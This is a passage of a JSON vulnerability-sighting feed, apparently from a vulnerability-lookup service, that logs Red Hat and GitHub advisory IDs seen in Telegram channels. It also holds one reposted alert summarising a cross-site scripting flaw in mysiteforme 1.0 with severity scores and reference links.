"creation_timestamp": "2026-04-06T15:20:42.000000Z"}, {"uuid": "2beba788-b1d9-4060-826f-b58baf608c94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7165", "type": "seen", "source": "Telegram/8HAXDkwfUuERvEZPrRm02gndBwAxNxuQaWo6blnqeOPCpO4", "content": "", "creation_timestamp": "2026-04-06T15:20:42.000000Z"}, {"uuid": "beefd048-8438-4858-aafa-df1134e7a783", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2879", "type": "seen", "source": "Telegram/8HAXDkwfUuERvEZPrRm02gndBwAxNxuQaWo6blnqeOPCpO4", "content": "", "creation_timestamp": "2026-04-06T15:20:42.000000Z"}, {"uuid": "8311be61-ef52-46f8-8a2c-66a55c119040", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7458", "type": "seen", "source": "Telegram/YPTFZMnbtWpnAikWtS-r7Wh5pSyLx87YJDgdlbqcufwDCfc", "content": "", "creation_timestamp": "2026-04-06T15:21:07.000000Z"}, {"uuid": "5990da21-aea1-4881-bfdc-9ee2a5e3d526", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2865", "type": "seen", "source": "Telegram/YPTFZMnbtWpnAikWtS-r7Wh5pSyLx87YJDgdlbqcufwDCfc", "content": "", "creation_timestamp": "2026-04-06T15:21:07.000000Z"}, {"uuid": "f11f0298-c4ad-4a21-a047-d7287c4add7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7165", "type": "seen", "source": "Telegram/S2jczk3vE9gaoR7d4AclSyR0RpexBjnR31AlSIRf7Vdsbmk", "content": "", "creation_timestamp": "2026-04-06T15:21:35.000000Z"}, {"uuid": "951f5e0f-8140-405b-bfeb-d375c0337753", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2880", "type": "seen", "source": "Telegram/S2jczk3vE9gaoR7d4AclSyR0RpexBjnR31AlSIRf7Vdsbmk", "content": "", "creation_timestamp": "2026-04-06T15:21:35.000000Z"}, {"uuid": "9aaf3bf1-f5dd-4bd7-b7c1-609a94a891fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2875", "type": "seen", "source": "Telegram/S2jczk3vE9gaoR7d4AclSyR0RpexBjnR31AlSIRf7Vdsbmk", "content": "", "creation_timestamp": "2026-04-06T15:21:35.000000Z"}, {"uuid": "26308aad-0a4d-43ae-aa28-e7ab65f044cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2879", "type": "seen", "source": "Telegram/S2jczk3vE9gaoR7d4AclSyR0RpexBjnR31AlSIRf7Vdsbmk", "content": "", "creation_timestamp": "2026-04-06T15:21:35.000000Z"}, {"uuid": "3adcb37a-8fab-4bd3-89d0-d714a16546a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VR63-2695-PPFF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/127", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-vr63-2695-ppff\n\ud83d\udd17 Aliases: CVE-2024-13137\n\ud83d\udd39 Details: A vulnerability was found in wangl1989 mysiteforme 1.0. It has been classified as problematic. This affects the function RestResponse of the file src/main/java/com/mysiteforme/admin/controller/system/SiteController. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T12:30:30Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T12:30:30Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-79\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-1313\n2. https://github.com/wangl1989/mysiteforme/issues/54\n3. https://github.com/wangl1989/mysiteforme/issues/54#issue-256532\n4. https://vuldb.com/?ctiid.290211\n5. https://vuldb.com/?id.290211\n6. https://vuldb.com/?submit.46843", "creation_timestamp": "2025-01-05T12:39:32.000000Z"}, {"uuid": "ca9494cd-dfbe-452b-a41d-dad9c798852e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7165", "type": "seen", "source": "Telegram/XnXiOLLeSA7x6QvYztZ81GubEg3cvrCefUsx39ENip1AnlE", "content": "", "creation_timestamp": "2026-04-06T15:21:14.000000Z"}, {"uuid": "881f4490-e360-496e-95e1-985ad8dcb835", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2880", "type": "seen", "source": "Telegram/XnXiOLLeSA7x6QvYztZ81GubEg3cvrCefUsx39ENip1AnlE", "content": "", "creation_timestamp": "2026-04-06T15:21:14.000000Z"}, {"uuid": "f1e92afd-3881-4e41-9b88-0bd3699fc276", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2866", "type": "seen", "source": "Telegram/S2jczk3vE9gaoR7d4AclSyR0RpexBjnR31AlSIRf7Vdsbmk", "content": "", "creation_timestamp": "2026-04-06T15:21:35.000000Z"}, {"uuid": "ddddac8f-219c-459c-a794-4c838fbd56c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7163", "type": "seen", "source": "Telegram/S2jczk3vE9gaoR7d4AclSyR0RpexBjnR31AlSIRf7Vdsbmk", "content": "", "creation_timestamp": "2026-04-06T15:21:35.000000Z"}, {"uuid": "b43ca881-211e-4f75-8a7b-493f75c5d018", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3976", "type": "seen", "source": "Telegram/XnXiOLLeSA7x6QvYztZ81GubEg3cvrCefUsx39ENip1AnlE", "content": "", "creation_timestamp": "2026-04-06T15:21:14.000000Z"}, {"uuid": "7850038e-ee5a-4256-bba3-26931583162c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2502", "type": "seen", "source": "Telegram/XnXiOLLeSA7x6QvYztZ81GubEg3cvrCefUsx39ENip1AnlE", "content": "", "creation_timestamp": "2026-04-06T15:21:14.000000Z"}, {"uuid": "ef6403cd-963c-409f-af7d-99567d561ceb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2873", "type": "seen", "source": "Telegram/XnXiOLLeSA7x6QvYztZ81GubEg3cvrCefUsx39ENip1AnlE", "content": "", "creation_timestamp": "2026-04-06T15:21:14.000000Z"}, {"uuid": "5f621ec0-8cc4-470c-a3c5-993344b7375c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:7458", "type": "seen", "source": "Telegram/XnXiOLLeSA7x6QvYztZ81GubEg3cvrCefUsx39ENip1AnlE", "content": "", "creation_timestamp": "2026-04-06T15:21:14.000000Z"}, {"uuid": "9157c9d6-9993-4c46-9315-5e4ed89f7af0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2865", "type": "seen", "source": "Telegram/XnXiOLLeSA7x6QvYztZ81GubEg3cvrCefUsx39ENip1AnlE", "content": "", "creation_timestamp": "2026-04-06T15:21:14.000000Z"}, {"uuid": "7b10d361-e952-49b6-a895-f63bf14b5025", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2861", "type": "seen", "source": "Telegram/XnXiOLLeSA7x6QvYztZ81GubEg3cvrCefUsx39ENip1AnlE", "content": "", "creation_timestamp": "2026-04-06T15:21:14.000000Z"}, {"uuid": "18c9ee95-e7b9-4778-9d85-8f90ad51d8d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2862", "type": "seen", "source": "Telegram/XnXiOLLeSA7x6QvYztZ81GubEg3cvrCefUsx39ENip1AnlE", "content": "", "creation_timestamp": "2026-04-06T15:21:14.000000Z"}, {"uuid": "92d08e0b-c598-4f99-aa50-1fb5a9d9199d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2500", "type": "seen", "source": "Telegram/XnXiOLLeSA7x6QvYztZ81GubEg3cvrCefUsx39ENip1AnlE", "content": "", "creation_timestamp": "2026-04-06T15:21:14.000000Z"}, {"uuid": "f3f1b34f-b8dc-4826-b75a-cffdb17ec3f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2502", "type": "seen", "source": "Telegram/S2jczk3vE9gaoR7d4AclSyR0RpexBjnR31AlSIRf7Vdsbmk", "content": "", "creation_timestamp": "2026-04-06T15:21:35.000000Z"}, {"uuid": "0b232575-06e1-4bae-b0ef-30155739718c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P4RG-967R-W4CV", "type": "seen", "source": "Telegram/ZR_wkJT-g6xqpr38tjocBfuP9bsA0qHKZRvqY91xv80DRmI", "content": "", "creation_timestamp": "2026-04-10T21:24:20.000000Z"}, {"uuid": "872543c3-94c5-4c87-8a60-18711437b169", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2943-CRP8-38XX", "type": "published-proof-of-concept", "source": "Telegram/4ztR6gRcWXk6YwHnamVGk5ZiVkHzJEoA9sdr8vYKwKHNiwI", "content": "", "creation_timestamp": "2026-04-10T21:24:55.000000Z"}, {"uuid": "e07b01c3-f799-4eef-823d-0002f3c7bd45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PCR3-6647-JH72", "type": "published-proof-of-concept", "source": "Telegram/4ztR6gRcWXk6YwHnamVGk5ZiVkHzJEoA9sdr8vYKwKHNiwI", "content": "", "creation_timestamp": "2026-04-10T21:24:55.000000Z"}, {"uuid": "31e3cb42-fea0-45af-9656-0934416b3511", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WVHV-QCQF-F3CX", "type": "published-proof-of-concept", "source": "Telegram/4ztR6gRcWXk6YwHnamVGk5ZiVkHzJEoA9sdr8vYKwKHNiwI", "content": "", "creation_timestamp": "2026-04-10T21:24:55.000000Z"}, {"uuid": "b9c0c201-b8b1-4e6f-9828-edfbdf5a1a44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FF24-4PRJ-GPMJ", "type": "published-proof-of-concept", "source": "Telegram/azLV8BVN7oG3TROgln-jCTMw5r1pt6lKfNlckhfBfrofK-k", "content": "", "creation_timestamp": "2026-04-10T23:27:06.000000Z"}, {"uuid": "b42ae728-b60e-4166-8c72-0b60ca48f6c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8JVC-MCX6-R4CG", "type": "published-proof-of-concept", "source": "Telegram/VrQ9Ov0z_xRZi9WqN3kvWB9KwPzyBbBtKpr0H2dFm10X_hQ", "content": "", "creation_timestamp": "2026-04-10T17:21:41.000000Z"}, {"uuid": "7ce26010-1d6e-49bd-bba4-107e62ff77d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2G3W-CPC4-CHR4", "type": "published-proof-of-concept", "source": "Telegram/KfGKsJKmMisviQyzRxPu6tVP9U_plbeA33H-GctVC-uIg4Q", "content": "", "creation_timestamp": "2026-04-10T19:31:07.000000Z"}, {"uuid": "dd0fa6b1-9f9c-4f3c-9143-ea408a6efcc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2CRG-3P73-43XP", "type": "published-proof-of-concept", "source": "Telegram/KfGKsJKmMisviQyzRxPu6tVP9U_plbeA33H-GctVC-uIg4Q", "content": "", "creation_timestamp": "2026-04-10T19:31:07.000000Z"}, {"uuid": "afb93a4f-f699-4f3a-b50a-94551b700183", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QM2M-28PF-HGJW", "type": "published-proof-of-concept", "source": "Telegram/KfGKsJKmMisviQyzRxPu6tVP9U_plbeA33H-GctVC-uIg4Q", "content": "", "creation_timestamp": "2026-04-10T19:31:07.000000Z"}, {"uuid": "e1c337a0-6149-4309-96a4-b21bdc6de015", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-99G3-W8GR-X37C", "type": "published-proof-of-concept", "source": "Telegram/KfGKsJKmMisviQyzRxPu6tVP9U_plbeA33H-GctVC-uIg4Q", "content": "", "creation_timestamp": "2026-04-10T19:31:07.000000Z"}, {"uuid": "01e2d1f8-fe90-4f7e-9378-9b0468aa1aed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HR5V-J9H9-XJHG", "type": "published-proof-of-concept", "source": "Telegram/KfGKsJKmMisviQyzRxPu6tVP9U_plbeA33H-GctVC-uIg4Q", "content": "", "creation_timestamp": "2026-04-10T19:31:07.000000Z"}, {"uuid": "98bd64d7-90e8-438c-97b7-d3aa0a4151a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8Q8C-V75X-Q2HX", "type": "seen", "source": "Telegram/3GtkgxN8M7sG_DIdrzHdivrGnBmd9UO5Jhg1ZnRR2u8dymg", "content": "", "creation_timestamp": "2026-04-10T19:31:11.000000Z"}, {"uuid": "5a9e5158-d3d1-4b05-9891-9ef416896751", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3C4R-6P77-XWR7", "type": "seen", "source": "Telegram/3GtkgxN8M7sG_DIdrzHdivrGnBmd9UO5Jhg1ZnRR2u8dymg", "content": "", "creation_timestamp": "2026-04-10T19:31:11.000000Z"}, {"uuid": "c6549769-bfd2-4ad0-bbeb-6eecced2aa63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4GP7-CFJH-77GV", "type": "seen", "source": "Telegram/3GtkgxN8M7sG_DIdrzHdivrGnBmd9UO5Jhg1ZnRR2u8dymg", "content": "", "creation_timestamp": "2026-04-10T19:31:11.000000Z"}, {"uuid": "54b31f36-2460-43ea-8eb0-f95098af8fbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QQ9R-63F6-V542", "type": "seen", "source": "Telegram/3GtkgxN8M7sG_DIdrzHdivrGnBmd9UO5Jhg1ZnRR2u8dymg", "content": "", "creation_timestamp": "2026-04-10T19:31:11.000000Z"}, {"uuid": "94ee80b6-e0a8-4a9f-ac0b-ced60613d5d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XF4J-XP2R-RQQX", "type": "seen", "source": "Telegram/VmPzW9vK7p7Zve81sAsPaRrR_R2EIHLwag0ULU7f22817b0", "content": "", "creation_timestamp": "2026-04-10T23:26:51.000000Z"}, {"uuid": "fcee257a-40d5-4725-85d7-e7de80503685", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V273-448J-V4QJ", "type": "seen", "source": "Telegram/VmPzW9vK7p7Zve81sAsPaRrR_R2EIHLwag0ULU7f22817b0", "content": "", "creation_timestamp": "2026-04-10T23:26:51.000000Z"}, {"uuid": "36b26f3d-910b-49da-ad3d-30a057861c8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GWJC-33FV-2GH4", "type": "published-proof-of-concept", "source": "Telegram/bba5KoRxZjw4aUqHfMWZuI7ux276_2ZWKOY2q9V8MiGPKQ0", "content": "", "creation_timestamp": "2026-04-05T15:16:27.000000Z"}, {"uuid": "1364b6bd-7151-479b-8cd9-bcc8522cecdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2862", "type": "seen", "source": "Telegram/zfToAAWf8eWnJ7ba07A0EZZ_iZLhP55gYdeGjYzJA6KMcCw", "content": "", "creation_timestamp": "2026-04-06T15:19:47.000000Z"}, {"uuid": "50dab64a-b8e8-468c-9399-df2c43e572a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2866", "type": "seen", "source": "Telegram/0sUuWW8J84hCZb1n0MF5lAvDyk6dii4XfiqOlA0c3Bj-PlY", "content": "", "creation_timestamp": "2026-04-06T15:20:12.000000Z"}, {"uuid": "17ce5165-5714-48b5-82c6-44d70b7907fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-59CV-QH65-VVRR", "type": "published-proof-of-concept", "source": "Telegram/5BYt_FCja3ItyUAudrFtyDv4j4kJF13U-uq-WjYMkVFgHgE", "content": "", "creation_timestamp": "2026-04-10T19:31:17.000000Z"}, {"uuid": "1297be5e-0ab1-4b20-a306-7369fc445efe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q74C-MX8X-489H", "type": "published-proof-of-concept", "source": "Telegram/5BYt_FCja3ItyUAudrFtyDv4j4kJF13U-uq-WjYMkVFgHgE", "content": "", "creation_timestamp": "2026-04-10T19:31:17.000000Z"}, {"uuid": "641e3b77-efc1-409a-8e26-bfed2f6ea0f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RQPG-P95V-FV98", "type": "published-proof-of-concept", "source": "Telegram/5BYt_FCja3ItyUAudrFtyDv4j4kJF13U-uq-WjYMkVFgHgE", "content": "", "creation_timestamp": "2026-04-10T19:31:17.000000Z"}, {"uuid": "f2ff2f9c-3e04-4c22-ac0c-7eac92a58e8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9H22-WRG7-82Q6", "type": "published-proof-of-concept", "source": "Telegram/5BYt_FCja3ItyUAudrFtyDv4j4kJF13U-uq-WjYMkVFgHgE", "content": "", "creation_timestamp": "2026-04-10T19:31:17.000000Z"}, {"uuid": "935a87df-c25c-4fee-910b-854345fcb5e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:7397", "type": "published-proof-of-concept", "source": "Telegram/fSWJ5AllMbSniV0KxDg2z0mHSbTQAC_C__F2EWZ07rPh-YE", "content": "", "creation_timestamp": "2026-04-10T19:31:23.000000Z"}, {"uuid": "3cb92cbc-7160-4dfb-94ae-cf3a4592cad6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:7403", "type": "published-proof-of-concept", "source": "Telegram/fSWJ5AllMbSniV0KxDg2z0mHSbTQAC_C__F2EWZ07rPh-YE", "content": "", "creation_timestamp": "2026-04-10T19:31:23.000000Z"}, {"uuid": "57abf9c2-58fb-4917-a66e-d9a681a530ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8HW4-FHWW-273G", "type": "published-proof-of-concept", "source": "Telegram/fSWJ5AllMbSniV0KxDg2z0mHSbTQAC_C__F2EWZ07rPh-YE", "content": "", "creation_timestamp": "2026-04-10T19:31:23.000000Z"}, {"uuid": "ebd899a5-6a77-4aba-b6cb-a90df9df017f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-863J-H6PF-3XHX", "type": "published-proof-of-concept", "source": "Telegram/fSWJ5AllMbSniV0KxDg2z0mHSbTQAC_C__F2EWZ07rPh-YE", "content": "", "creation_timestamp": "2026-04-10T19:31:23.000000Z"}, {"uuid": "89a2f91e-1f6a-411b-8de9-4e28ea9dd905", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-32PV-MPQG-H292", "type": "published-proof-of-concept", "source": "Telegram/fSWJ5AllMbSniV0KxDg2z0mHSbTQAC_C__F2EWZ07rPh-YE", "content": "", "creation_timestamp": "2026-04-10T19:31:23.000000Z"}, {"uuid": "2513844b-0bcd-474d-bccf-59fe4801513b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XP9R-PRPG-373R", "type": "published-proof-of-concept", "source": "Telegram/322WwBU1dw1XQZkuhsa_ku_ExWgO3IPBT_TwKsYVMIxa3Dc", "content": "", "creation_timestamp": "2026-04-10T19:31:00.000000Z"}, {"uuid": "7ab6f5b1-0c3d-456d-8b8e-38032b4dc81a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4GR2-CR97-Q9FX", "type": "seen", "source": "Telegram/oNJqzE-05Z_hzc8NPQW-z5MMZ2uUFxP7FYrJiMTOKneUM6w", "content": "", "creation_timestamp": "2026-04-11T03:21:45.000000Z"}, {"uuid": "6930427e-75a3-4d86-b4dd-ea2658733673", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2MVM-RG5V-7HFQ", "type": "published-proof-of-concept", "source": "Telegram/nNz4AuVWmZsX2vjW9IzWDm0wIi6EKHH8QFJ1lll9JUSWJdI", "content": "", "creation_timestamp": "2026-04-06T19:28:28.000000Z"}, {"uuid": "8439abee-0ab5-4aab-a547-8b1cb5bd5ba9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:2695", "type": "seen", "source": "Telegram/8zEAgaRSdVOPVh8YiiaVjapuYDuCzrad_OizJ-8M58UocKc", "content": "", "creation_timestamp": "2026-03-26T23:20:03.000000Z"}, {"uuid": "aba003e7-f361-49f1-aa99-b58461335b44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q938-GHWV-8GVC", "type": "seen", "source": "Telegram/8zEAgaRSdVOPVh8YiiaVjapuYDuCzrad_OizJ-8M58UocKc", "content": "", "creation_timestamp": "2026-03-26T23:20:03.000000Z"}, {"uuid": "09b184ce-8a6e-4e86-8a20-70948d012690", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8M32-P958-JG99", "type": "seen", "source": "Telegram/m01DCzKFy5kAt_T9sjIWhyEARPkz65_AkyqWTYGgzfJ1E6g", "content": "", "creation_timestamp": "2026-04-06T23:22:09.000000Z"}, {"uuid": "308f4c8c-3f2e-45ac-808f-7f1f1f97fe92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QQMV-5P3G-PX89", "type": "seen", "source": "Telegram/m01DCzKFy5kAt_T9sjIWhyEARPkz65_AkyqWTYGgzfJ1E6g", "content": "", "creation_timestamp": "2026-04-06T23:22:09.000000Z"}, {"uuid": "a1c5c51e-6c1a-4d83-aef4-c5bc1ad9bc28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J3VJ-59VV-H4RC", "type": "seen", "source": "Telegram/yEep_Cm2Odjvpf0uI90hS1hr8dhkmidpoORZ8hNAmW5Xwfo", "content": "", "creation_timestamp": "2026-04-07T19:35:16.000000Z"}, {"uuid": "1bec97e9-8ef6-458d-853a-0644e2936473", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VG4M-HC29-JGQJ", "type": "seen", "source": "Telegram/yEep_Cm2Odjvpf0uI90hS1hr8dhkmidpoORZ8hNAmW5Xwfo", "content": "", "creation_timestamp": "2026-04-07T19:35:16.000000Z"}, {"uuid": "5c3cec5f-9831-469f-99eb-b2741b0338fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8R36-FVXJ-26QV", "type": "seen", "source": "Telegram/yEep_Cm2Odjvpf0uI90hS1hr8dhkmidpoORZ8hNAmW5Xwfo", "content": "", "creation_timestamp": "2026-04-07T19:35:16.000000Z"}, {"uuid": "5e8245b3-ab7b-4cce-ab71-81a9337bbda3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-33QG-7WPP-89CQ", "type": "seen", "source": "Telegram/d9ntGhgAXUNib3HVhoGCh5gTeuhEkXLp8JxGb0TRA4y7Jks", "content": "", "creation_timestamp": "2026-04-07T19:35:24.000000Z"}, {"uuid": "4fa9ddcf-5f1a-4691-a113-db42e501eed7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X4FF-Q6H8-V7GW", "type": "published-proof-of-concept", "source": 